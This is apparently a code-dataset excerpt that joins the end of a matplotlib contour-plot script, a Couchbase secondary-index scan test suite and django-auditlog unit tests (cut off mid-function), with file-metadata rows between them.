Z = np.sqrt(X ** 2 + Y ** 2 )
levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5]
contour2 = ax2.contour(X, Y, Z, levels)
# set titles
f.suptitle('Contour Plots', fontweight="bold", size=14)
ax1.set_title('Raw', fontweight="bold")
ax2.set_title('Standardized', fontweight="bold")
ax1.grid(True)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
ax1.set_xlabel('Feature 2')
ax1.set_ylabel('Feature 1')
ax2.grid(True)
ax2.set_xticklabels([])
ax2.set_yticklabels([])
ax2.set_xlabel('Feature 2')
ax2.set_ylabel('Feature 1')
# Adjust layout
plt.figlegend(lines, levels, title='Loss', loc="center left", bbox_to_anchor=(0,0.64))
plt.tight_layout()
plt.subplots_adjust(top=0.86)
| 26.020833 | 86 | 0.668535 |
cf41f89ede692069a30d526e22b4f2cb270ebfbc | 21,994 | py | Python | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | from .base_gsi import BaseSecondaryIndexingTests
import copy
from couchbase_helper.query_definitions import QueryDefinition
from couchbase_helper.query_definitions import SQLDefinitionGenerator
from couchbase_helper.tuq_generators import TuqGenerators
QUERY_TEMPLATE = "SELECT {0} FROM %s "
class SecondaryIndexingScanTests(BaseSecondaryIndexingTests):
def setUp(self):
super(SecondaryIndexingScanTests, self).setUp()
def tearDown(self):
super(SecondaryIndexingScanTests, self).tearDown()
def suite_setUp(self):
pass
def suite_tearDown(self):
pass
def test_create_query_explain_drop_index(self):
self.use_primary_index= self.input.param("use_primary_index", False)
self.indexes= self.input.param("indexes", "").split(":")
self.emitFields= self.input.param("emitFields", "*").split(":")
self.whereCondition= self.input.param("whereCondition", None)
self.emitFields = ",".join(self.emitFields)
query_template = QUERY_TEMPLATE
query_template = query_template.format(self.emitFields)
self.index_name = "test_create_query_explain_drop_index"
run_create_index = True
if self.use_primary_index:
run_create_index = False
run_drop_index = False
self.index_name = "primary"
if self.whereCondition:
query_template += " WHERE {0}".format(self.whereCondition)
query_template = self._translate_where_clause(query_template)
query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes,
query_template=query_template, groups=[])
self.run_multi_operations(
buckets = self.buckets,
query_definitions = [query_definition],
create_index = run_create_index, drop_index = run_drop_index,
query_with_explain = self.run_query_with_explain, query = self.run_query)
def test_multi_create_query_explain_drop_index(self):
try:
self._create_index_in_async()
self.run_doc_ops()
self._query_explain_in_async()
self._verify_index_map()
except Exception as ex:
self.log.info(ex)
raise
finally:
tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions,
drop_index=True)
self._run_tasks(tasks)
def test_multi_create_query_explain_drop_index_with_concurrent_mutations(self):
try:
kvops_tasks = self.async_run_doc_ops()
self._create_index_in_async()
# runs operations
self._run_tasks(kvops_tasks)
self._query_explain_in_async()
except Exception as ex:
self.log.info(ex)
raise
finally:
tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions,
create_index=False,
drop_index=True,
query_with_explain=False, query=False,
scan_consistency=self.scan_consistency)
self._run_tasks(tasks)
def test_concurrent_mutations_index_create_query_drop(self):
self.query_definitions_create_candidates =[]
self.query_definitions_query_candidates =[]
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage=use_percentage,
use_random=self.random_scan_vector)
try:
self.query_definitions_drop_candidates = copy.deepcopy(self.query_definitions)
self.query_definitions_create_candidates = copy.deepcopy(self.query_definitions)
self.query_definitions_query_candidates = copy.deepcopy(self.query_definitions)
i =0
for query_definition in self.query_definitions_drop_candidates:
query_definition.index_name += str(i)+"_drop_candidates"
i+=1
for query_definition in self.query_definitions_create_candidates:
query_definition.index_name += str(i)+"_create_candidates"
i+=1
for query_definition in self.query_definitions_query_candidates:
query_definition.index_name += str(i)+"_query_candidates"
i+=1
# Start Mutations
kvops_tasks = self.async_run_doc_ops()
# Initialize indexes
self._create_index_in_async(query_definitions = self.query_definitions_drop_candidates)
self._create_index_in_async(query_definitions = self.query_definitions_query_candidates)
self.log.info("<<<<< Run Query Tasks >>>>>>")
query_tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions=self.query_definitions_query_candidates,
create_index=False, drop_index=False,
query_with_explain=False, query=True, scan_consistency=self.scan_consistency,
scan_vectors=scan_vectors)
self.log.info("<<<<< Run Drop Tasks >>>>>>")
drop_tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_drop_candidates,
create_index = False, drop_index = True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._create_index_in_async(query_definitions = self.query_definitions_create_candidates)
# runs operations
self._run_tasks(kvops_tasks)
self._run_tasks(query_tasks)
self._run_tasks(drop_tasks)
except Exception as ex:
self.log.info(ex)
if not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
finally:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_create_candidates,
create_index = False, drop_index=True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._run_tasks(tasks)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_query_candidates,
create_index = False, drop_index=True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._run_tasks(tasks)
def test_multi_create_query_explain_drop_index_primary(self):
qdfs = []
for query_definition in self.query_definitions:
query_definition.index_name = "#primary"
qdfs.append(query_definition)
self.query_definitions = qdfs
self.sleep(15)
try:
self._verify_primary_index_count()
self.run_doc_ops()
self._verify_primary_index_count()
self._query_explain_in_async()
except Exception as ex:
self.log.info(ex)
raise
def test_multi_create_query_explain_drop_index_with_index_where_clause(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause()
self.use_where_clause_in_index = True
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index()
def test_multi_create_query_explain_drop_index_with_index_expressions(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index()
def test_multi_create_query_explain_drop_index_with_index_expressions_and_where_clause(self):
self.use_where_clause_in_index = True
self.test_multi_create_query_explain_drop_index_with_index_expressions()
def test_multi_create_query_explain_drop_index_scan_consistency_with_index_expressions(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index_scan_consistency()
def test_multi_create_query_explain_drop_index_scan_consistency_with_where_clause(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause()
self.use_where_clause_in_index = True
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index_scan_consistency()
def test_multi_create_query_explain_drop_index_scan_consistency(self):
self.random_scan_vector= self.input.param("random_scan_vector", False)
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
try:
self._create_index_in_async()
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = self.run_query_with_explain, query = False)
self._run_tasks(tasks)
# runs operations
self.run_doc_ops()
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
# verify results
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = self.run_query_with_explain, query = False)
self._run_tasks(tasks)
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
except Exception as ex:
self.log.info(ex)
if self.scan_consistency == "at_plus" and not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
finally:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index=True,
query_with_explain = False, query = False)
self._run_tasks(tasks)
def test_primary_query_scan_consistency(self):
self.random_scan_vector= self.input.param("random_scan_vector", False)
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
try:
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
# runs operations
self.run_doc_ops()
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
self._verify_primary_index_count()
# verify results
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
except Exception as ex:
self.log.info(ex)
if self.scan_consistency == "at_plus" and not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
def test_failure_query_with_non_existing_primary_index(self):
self.indexes= self.input.param("indexes", "").split(":")
self.emitFields= self.input.param("emitFields", "*").split(":")
self.whereCondition= self.input.param("whereCondition", None)
self.emitFields = ",".join(self.emitFields)
query_template = QUERY_TEMPLATE
query_template = query_template.format(self.emitFields)
self.index_name = "test_failure_query_with_non_existing_primary_index"
if self.whereCondition:
query_template += " WHERE {0}".format(self.whereCondition)
query_template = self._translate_where_clause(query_template)
query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes,
query_template=query_template, groups=[])
try:
self.run_multi_operations(
buckets = self.buckets,
query_definitions = [query_definition],
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query)
self.fail(" querying without indexes and primary indexes is not allowed")
except Exception as ex:
msg = "No primary index on keyspace default. Use CREATE PRIMARY INDEX to create one."
self.assertTrue(msg in str(ex), "did not receive message as expected : {0}".format(ex))
def _generate_scan_vector_ranges(self, scan_vector_per_values = None):
scan_vector_per_values = str(scan_vector_per_values)
values = scan_vector_per_values.split(":")
new_values = []
for val in values:
new_values.append(float(val))
return new_values
def _run_tasks(self, tasks):
for task in tasks:
task.result()
def _translate_where_clause(self, query):
query = query.replace("EQUALS", "==")
query = query.replace("NOT_EQUALS", "!=")
query = query.replace("LESS_THAN", "<")
query = query.replace("LESS_THAN_EQUALS", "<=")
query = query.replace("GREATER_THAN", ">")
query = query.replace("GREATER_THAN_EQUALS", ">=")
return query
def _create_index_in_async(self, query_definitions = None, buckets = None, index_nodes = None):
refer_index = []
if buckets == None:
buckets = self.buckets
if query_definitions == None:
query_definitions = self.query_definitions
if not self.run_async:
self.run_multi_operations(buckets=buckets, query_definitions=query_definitions, create_index=True)
return
if index_nodes == None:
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
x = len(query_definitions) - 1
while x > -1:
tasks = []
build_index_map = {}
for bucket in buckets:
build_index_map[bucket.name] = []
for server in index_nodes:
for bucket in buckets:
if (x > -1):
key = "{0}:{1}".format(bucket.name, query_definitions[x].index_name)
if (key not in refer_index):
refer_index.append(key)
refer_index.append(query_definitions[x].index_name)
deploy_node_info = None
if self.use_gsi_for_secondary:
deploy_node_info = ["{0}:{1}".format(server.ip, server.port)]
build_index_map[bucket.name].append(query_definitions[x].index_name)
tasks.append(self.async_create_index(bucket.name, query_definitions[x],
deploy_node_info=deploy_node_info))
x -= 1
for task in tasks:
task.result()
if self.defer_build:
for bucket_name in list(build_index_map.keys()):
if len(build_index_map[bucket_name]) > 0:
build_index_task = self.async_build_index(bucket_name, build_index_map[bucket_name])
build_index_task.result()
monitor_index_tasks = []
for bucket_name in list(build_index_map.keys()):
for index_name in build_index_map[bucket_name]:
monitor_index_tasks.append(self.async_monitor_index(bucket_name, index_name))
for task in monitor_index_tasks:
task.result()
| 52.743405 | 125 | 0.622352 |
3b2bb4c51c1c8a2f00ce76586497e59d4dae802b | 30,853 | py | Python | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | import datetime
import django
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.models import User, AnonymousUser
from django.core.exceptions import ValidationError
from django.db.models.signals import pre_save
from django.http import HttpResponse
from django.test import TestCase, RequestFactory
from django.utils import dateformat, formats, timezone
from dateutil.tz import gettz
from auditlog.middleware import AuditlogMiddleware
from auditlog.models import LogEntry
from auditlog.registry import auditlog
from auditlog_tests.models import SimpleModel, AltPrimaryKeyModel, UUIDPrimaryKeyModel, \
ProxyModel, SimpleIncludeModel, SimpleExcludeModel, SimpleMappingModel, RelatedModel, \
ManyRelatedModel, AdditionalDataIncludedModel, DateTimeFieldModel, ChoicesFieldModel, \
CharfieldTextfieldModel, PostgresArrayFieldModel, NoDeleteHistoryModel, AdditionalDataIncludedWithKwargsModel
from auditlog import compat
class SimpleModelTest(TestCase):
def setUp(self):
self.obj = SimpleModel.objects.create(text='I am not difficult.')
def test_create(self):
"""Creation is logged correctly."""
# Get the object to work with
obj = self.obj
# Check for log entries
self.assertTrue(obj.history.count() == 1, msg="There is one log entry")
try:
history = obj.history.get()
except obj.history.DoesNotExist:
self.assertTrue(False, "Log entry exists")
else:
self.assertEqual(history.action, LogEntry.Action.CREATE, msg="Action is 'CREATE'")
self.assertEqual(history.object_repr, str(obj), msg="Representation is equal")
def test_update(self):
"""Updates are logged correctly."""
# Get the object to work with
obj = self.obj
# Change something
obj.boolean = True
obj.save()
# Check for log entries
self.assertTrue(obj.history.filter(action=LogEntry.Action.UPDATE).count() == 1, msg="There is one log entry for 'UPDATE'")
history = obj.history.get(action=LogEntry.Action.UPDATE)
self.assertJSONEqual(history.changes, '{"boolean": ["False", "True"]}', msg="The change is correctly logged")
def test_delete(self):
"""Deletion is logged correctly."""
# Get the object to work with
obj = self.obj
history = obj.history.latest()
# Delete the object
obj.delete()
# Check for log entries
self.assertTrue(LogEntry.objects.filter(content_type=history.content_type, object_pk=history.object_pk, action=LogEntry.Action.DELETE).count() == 1, msg="There is one log entry for 'DELETE'")
def test_recreate(self):
SimpleModel.objects.all().delete()
self.setUp()
self.test_create()
class AltPrimaryKeyModelTest(SimpleModelTest):
def setUp(self):
self.obj = AltPrimaryKeyModel.objects.create(key=str(datetime.datetime.now()), text='I am strange.')
class UUIDPrimaryKeyModelModelTest(SimpleModelTest):
def setUp(self):
self.obj = UUIDPrimaryKeyModel.objects.create(text='I am strange.')
def test_get_for_object(self):
self.obj.boolean = True
self.obj.save()
self.assertEqual(LogEntry.objects.get_for_object(self.obj).count(), 2)
def test_get_for_objects(self):
self.obj.boolean = True
self.obj.save()
self.assertEqual(LogEntry.objects.get_for_objects(UUIDPrimaryKeyModel.objects.all()).count(), 2)
class ProxyModelTest(SimpleModelTest):
def setUp(self):
self.obj = ProxyModel.objects.create(text='I am not what you think.')
class ManyRelatedModelTest(TestCase):
"""
Test the behaviour of a many-to-many relationship.
"""
def setUp(self):
self.obj = ManyRelatedModel.objects.create()
self.rel_obj = ManyRelatedModel.objects.create()
self.obj.related.add(self.rel_obj)
def test_related(self):
self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).count(), self.rel_obj.history.count())
self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).first(), self.rel_obj.history.first())
class MiddlewareTest(TestCase):
"""
Test the middleware responsible for connecting and disconnecting the signals used in automatic logging.
"""
def setUp(self):
self.middleware = AuditlogMiddleware()
self.factory = RequestFactory()
self.user = User.objects.create_user(username='test', email='test@example.com', password='top_secret')
def test_request_anonymous(self):
"""No actor will be logged when a user is not logged in."""
# Create a request
request = self.factory.get('/')
request.user = AnonymousUser()
# Run middleware
self.middleware.process_request(request)
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
# Finalize transaction
self.middleware.process_exception(request, None)
def test_request(self):
"""The actor will be logged when a user is logged in."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
# Validate result
self.assertTrue(pre_save.has_listeners(LogEntry))
# Finalize transaction
self.middleware.process_exception(request, None)
def test_response(self):
"""The signal will be disconnected when the request is processed."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it.
self.middleware.process_response(request, HttpResponse())
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
def test_exception(self):
"""The signal will be disconnected when an exception is raised."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it.
self.middleware.process_exception(request, ValidationError("Test"))
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
class SimpeIncludeModelTest(TestCase):
"""Log only changes in include_fields"""
def test_register_include_fields(self):
sim = SimpleIncludeModel(label='Include model', text='Looong text')
sim.save()
self.assertTrue(sim.history.count() == 1, msg="There is one log entry")
# Change label, record
sim.label = 'Changed label'
sim.save()
self.assertTrue(sim.history.count() == 2, msg="There are two log entries")
# Change text, ignore
sim.text = 'Short text'
sim.save()
self.assertTrue(sim.history.count() == 2, msg="There are two log entries")
class SimpeExcludeModelTest(TestCase):
"""Log only changes that are not in exclude_fields"""
def test_register_exclude_fields(self):
sem = SimpleExcludeModel(label='Exclude model', text='Looong text')
sem.save()
self.assertTrue(sem.history.count() == 1, msg="There is one log entry")
# Change label, ignore
sem.label = 'Changed label'
sem.save()
self.assertTrue(sem.history.count() == 2, msg="There are two log entries")
# Change text, record
sem.text = 'Short text'
sem.save()
self.assertTrue(sem.history.count() == 2, msg="There are two log entries")
class SimpleMappingModelTest(TestCase):
"""Diff displays fields as mapped field names where available through mapping_fields"""
def test_register_mapping_fields(self):
smm = SimpleMappingModel(sku='ASD301301A6', vtxt='2.1.5', not_mapped='Not mapped')
smm.save()
self.assertTrue(smm.history.latest().changes_dict['sku'][1] == 'ASD301301A6',
msg="The diff function retains 'sku' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_dict['not_mapped'][1] == 'Not mapped',
msg="The diff function does not map 'not_mapped' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_display_dict['Product No.'][1] == 'ASD301301A6',
msg="The diff function maps 'sku' as 'Product No.' and can be retrieved.")
self.assertTrue(smm.history.latest().changes_display_dict['Version'][1] == '2.1.5',
msg=("The diff function maps 'vtxt' as 'Version' through verbose_name"
" setting on the model field and can be retrieved."))
self.assertTrue(smm.history.latest().changes_display_dict['not mapped'][1] == 'Not mapped',
msg=("The diff function uses the django default verbose name for 'not_mapped'"
" and can be retrieved."))
class AdditionalDataModelTest(TestCase):
"""Log additional data if get_additional_data is defined in the model"""
def test_model_without_additional_data(self):
obj_wo_additional_data = SimpleModel.objects.create(text='No additional '
'data')
obj_log_entry = obj_wo_additional_data.history.get()
self.assertIsNone(obj_log_entry.additional_data)
def test_model_with_additional_data(self):
related_model = SimpleModel.objects.create(text='Log my reference')
obj_with_additional_data = AdditionalDataIncludedModel(
label='Additional data to log entries', related=related_model)
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 1,
msg="There is 1 log entry")
log_entry = obj_with_additional_data.history.get()
self.assertIsNotNone(log_entry.additional_data)
extra_data = log_entry.additional_data
self.assertTrue(extra_data['related_model_text'] == related_model.text,
msg="Related model's text is logged")
self.assertTrue(extra_data['related_model_id'] == related_model.id,
msg="Related model's id is logged")
def test_model_with_additional_data_and_kwargs(self):
related_model = SimpleModel.objects.create(text='Log my reference')
obj_with_additional_data = AdditionalDataIncludedWithKwargsModel(
label='Additional data to log entries', related=related_model)
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 1,
msg="There is 1 log entry")
log_entry = obj_with_additional_data.history.get()
self.assertIsNotNone(log_entry.additional_data)
extra_data = log_entry.additional_data
self.assertTrue(extra_data['action'] == 0,
msg="Related model's create action is logged in additional data")
obj_with_additional_data.label = "update test"
obj_with_additional_data.save()
self.assertTrue(obj_with_additional_data.history.count() == 2,
msg="There are 2 log entries")
log_entry = obj_with_additional_data.history.first()
extra_data = log_entry.additional_data
self.assertTrue(extra_data['action'] == 1,
msg="Related model's update action is logged in additional data")
class DateTimeFieldModelTest(TestCase):
"""Tests if DateTimeField changes are recognised correctly"""
utc_plus_one = timezone.get_fixed_timezone(datetime.timedelta(hours=1))
now = timezone.now()
def test_model_with_same_time(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to same datetime and timezone
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
dtm.timestamp = timestamp
dtm.date = datetime.date(2017, 1, 10)
dtm.time = datetime.time(12, 0)
dtm.save()
# Nothing should have changed
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
def test_model_with_different_timezone(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to same datetime in another timezone
timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=self.utc_plus_one)
dtm.timestamp = timestamp
dtm.save()
# Nothing should have changed
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
def test_model_with_different_datetime(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime in the same timezone
timestamp = datetime.datetime(2017, 1, 10, 13, 0, tzinfo=timezone.utc)
dtm.timestamp = timestamp
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_date(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime in the same timezone
date = datetime.datetime(2017, 1, 11)
dtm.date = date
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_time(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime in the same timezone
time = datetime.time(6, 0)
dtm.time = time
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_model_with_different_time_and_timezone(self):
timestamp = datetime.datetime(2017, 1, 10, 12, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.count() == 1, msg="There is one log entry")
# Change timestamp to another datetime and another timezone
timestamp = datetime.datetime(2017, 1, 10, 14, 0, tzinfo=self.utc_plus_one)
dtm.timestamp = timestamp
dtm.save()
# The time should have changed.
self.assertTrue(dtm.history.count() == 2, msg="There are two log entries")
def test_changes_display_dict_datetime(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE))
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
dateformat.format(localized_timestamp, settings.DATETIME_FORMAT),
msg=("The datetime should be formatted according to Django's settings for"
" DATETIME_FORMAT"))
timestamp = timezone.now()
dtm.timestamp = timestamp
dtm.save()
localized_timestamp = timestamp.astimezone(gettz(settings.TIME_ZONE))
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
dateformat.format(localized_timestamp, settings.DATETIME_FORMAT),
msg=("The datetime should be formatted according to Django's settings for"
" DATETIME_FORMAT"))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["timestamp"][1] == \
formats.localize(localized_timestamp),
msg=("The datetime should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_changes_display_dict_date(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
dateformat.format(date, settings.DATE_FORMAT),
msg=("The date should be formatted according to Django's settings for"
" DATE_FORMAT unless USE_L10N is True."))
date = datetime.date(2017, 1, 11)
dtm.date = date
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
dateformat.format(date, settings.DATE_FORMAT),
msg=("The date should be formatted according to Django's settings for"
" DATE_FORMAT unless USE_L10N is True."))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["date"][1] == \
formats.localize(date),
msg=("The date should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_changes_display_dict_time(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
